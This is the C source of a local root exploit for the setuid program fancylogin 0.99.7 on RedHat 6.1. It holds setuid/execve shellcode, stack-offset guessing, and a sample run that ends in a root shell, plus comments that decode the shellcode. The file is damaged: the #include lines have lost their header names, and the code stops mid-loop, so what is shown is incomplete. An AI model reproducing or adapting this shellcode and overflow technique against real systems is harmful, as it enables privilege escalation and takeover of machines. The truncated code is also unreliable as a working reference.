/*
* (fancylogin 0.99.7) (suid) local root exploit.
* Author: icesk of hhp. :: Greets to ttl.
* www.hhp-programming.net / icesk@hhp-programming.net
* Tested on redhat 6.1.
*
* bash$ ./hhp-fancy_smash.c
* esp: bffffcc8 offset: -740 return: bfffffb4 align: 0
* This is fancylogin 0.99.7
* .
* bash# exit
*/
#include
#include
#include
/*
 * Payload placed in the overflowed buffer. Only the trailing "/bin/sh" is
 * readable; the bytes before it are x86-32 Linux machine code (the repeated
 * "\xcd\x80" pairs are int 0x80 system-call traps, and the "\xb0\x17" /
 * "\xb0\x0b" loads look like the classic setuid()/execve() pair). The
 * literal contains no 0x00 byte, so a strcpy()-style copy carries it intact.
 * Defensive note: this only works against a fixed, executable stack with no
 * address randomisation, i.e. the RedHat 6.1 layout named in the header.
 */
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Length of the string handed to the target; buffer below is sized from it. */
#define bsize 700
/* Default distance subtracted from get_sp() to form the guessed return
 * address (main: off = offset; return = get_sp() - off). Overridden by
 * argv[1]; note the sample run in the file header used -740, not -710. */
#define offset -710
/* Scratch area main fills before invoking the target — presumably the
 * return-address/NOP/shellcode layout; the filling loop is cut off below. */
char buffer[bsize * 6];
char *get_sp() { asm("movl %esp,%eax"); }
main(int n, char **v) {
int i, off, align; align = 0;
if(n > 1) { off = atoi(v[1]); align = atoi(v[2]); }
else { off = offset; align = 0; }
printf("esp: %0x offset: %d return: %0x align: %d\n", get_sp(), off, get_sp()
- off, align);
for(i=0;i |